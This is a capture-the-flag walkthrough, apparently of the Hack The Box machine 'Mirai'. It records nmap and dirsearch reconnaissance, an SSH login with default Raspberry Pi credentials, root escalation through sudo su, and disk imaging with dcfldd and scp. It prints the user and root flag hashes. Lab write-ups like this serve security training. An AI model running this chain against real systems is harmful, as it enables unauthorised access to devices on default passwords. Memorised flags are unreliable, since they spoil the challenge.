Machine-Name  :  Mirai
IP-Address    :  10.129.129.229

Command-Line: sudo nmap -p- -T4 -A 10.129.129.229
Result:
    Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-05 17:59 UTC
    Nmap scan report for 10.129.129.229
    Host is up (0.049s latency).
    Not shown: 65529 closed ports
    PORT      STATE SERVICE VERSION
    22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
    | ssh-hostkey:
    |   1024 aa:ef:5c:e0:8e:86:97:82:47:ff:4a:e5:40:18:90:c5 (DSA)
    |   2048 e8:c1:9d:c5:43:ab:fe:61:23:3b:d7:e4:af:9b:74:18 (RSA)
    |   256 b6:a0:78:38:d0:c8:10:94:8b:44:b2:ea:a0:17:42:2b (ECDSA)
    |_  256 4d:68:40:f7:20:c4:e5:52:80:7a:44:38:b8:a2:a7:52 (ED25519)
    53/tcp    open  domain  dnsmasq 2.76
    | dns-nsid:
    |_  bind.version: dnsmasq-2.76
    80/tcp    open  http    lighttpd 1.4.35
    |_http-server-header: lighttpd/1.4.35
    |_http-title: Site doesn't have a title (text/html; charset=UTF-8).
    1586/tcp  open  upnp    Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
    32400/tcp open  http    Plex Media Server httpd
    | http-auth:
    | HTTP/1.1 401 Unauthorized\x0D
    |_  Server returned status 401 but no WWW-Authenticate header.
    |_http-cors: HEAD GET POST PUT DELETE OPTIONS
    |_http-favicon: Plex
    |_http-title: Unauthorized
    32469/tcp open  upnp    Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
    No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
    TCP/IP fingerprint:
    OS:SCAN(V=7.91%E=4%D=4/5%OT=22%CT=1%CU=33539%PV=Y%DS=2%DC=T%G=Y%TM=606B503C
    OS:%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=104%TI=Z%CI=I%II=I%TS=8)OPS(
    OS:O1=M54DST11NW6%O2=M54DST11NW6%O3=M54DNNT11NW6%O4=M54DST11NW6%O5=M54DST11
    OS:NW6%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(
    OS:R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
    OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
    OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
    OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
    OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=
    OS:S)

    Network Distance: 2 hops
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    TRACEROUTE (using port 21/tcp)
    HOP RTT      ADDRESS
    1   50.94 ms 10.10.14.1
    2   51.05 ms 10.129.129.229

    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 54.83 seconds


Command-Line: ./dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e php,txt -f -t 50 -u http://10.129.129.229
Result:
    [18:18:15] 301 -    0B  - /admin  ->  http://10.129.129.229/admin/
    [18:19:08] 200 -   13B  - /versions
    [18:19:08] 200 -   13B  - /versions/


Notes: /admin is a PiHole page. This IP is likely a Raspberry-Pi. Attempting to log in with default RasPi credentials (pi:raspberry)
URL: https://www.raspberrypi.org/documentation/linux/usage/users.md

Command-Line: ssh pi@10.129.129.229
Password: raspberry
Result:
    The programs included with the Debian GNU/Linux system are free software;
    the exact distribution terms for each program are described in the
    individual files in /usr/share/doc/*/copyright.

    Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
    permitted by applicable law.
    Last login: Sun Aug 27 14:47:50 2017 from localhost

    SSH is enabled and the default password for the 'pi' user has not been changed.
    This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.


    SSH is enabled and the default password for the 'pi' user has not been changed.
    This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.

    pi@raspberrypi:~ $


pi@raspberrypi:~ $ cat Desktop/user.txt
Result: ff837707441b257a20e32199d7c8838d
    *** USER OWNED ***

pi@raspberrypi:~ $ cat .bash_history
Result:
    ifconfig
    sudo su

pi@raspberrypi:~ $ sudo su
Result:
    root@raspberrypi:/home/pi#

root@raspberrypi:/home/pi# cat /root/root.txt
Result:
    I lost my original root.txt! I think I may have a backup on my USB stick...

root@raspberrypi:/home/pi# df
Result:
    Filesystem     1K-blocks    Used Available Use% Mounted on
    aufs             8856504 2883184   5500388  35% /
    tmpfs             102396    4880     97516   5% /run
    /dev/sda1        1354528 1354528         0 100% /lib/live/mount/persistence/sda1
    /dev/loop0       1267456 1267456         0 100% /lib/live/mount/rootfs/filesystem.squashfs
    tmpfs             255988       0    255988   0% /lib/live/mount/overlay
    /dev/sda2        8856504 2883184   5500388  35% /lib/live/mount/persistence/sda2
    devtmpfs           10240       0     10240   0% /dev
    tmpfs             255988       8    255980   1% /dev/shm
    tmpfs               5120       4      5116   1% /run/lock
    tmpfs             255988       0    255988   0% /sys/fs/cgroup
    tmpfs             255988       8    255980   1% /tmp
    /dev/sdb            8887      93      8078   2% /media/usbstick
    tmpfs              51200       0     51200   0% /run/user/999
    tmpfs              51200       0     51200   0% /run/user/1000

Notes: /dev/sdb mounted on /media/usbstick

root@raspberrypi:/home/pi# strings /dev/sdb
    >r &
    /media/usbstick
    lost+found
    root.txt
    damnit.txt
    >r &
    >r &
    /media/usbstick
    lost+found
    root.txt
    damnit.txt
    >r &
    /media/usbstick
    2]8^
    lost+found
    root.txt
    damnit.txt
    >r &
    3d3e483143ff12ec505d026fa13e020b
    Damnit! Sorry man I accidentally deleted your files off the USB stick.
    Do you know if there is any way to get them back?
    -James

Notes: Found the hash "3d3e483143ff12ec505d026fa13e020b". Attempting to Own Root.
Result:
    *** ROOT OWNED ***

Notes: Alternative way of reading the file would be:
    sudo dcfldd if=/dev/sdb of=/home/pi/usb.dd ​
    scp pi@10.129.129.229://home/pi/usb.dd .
    cat usb.dd

      *** FINISHED ***
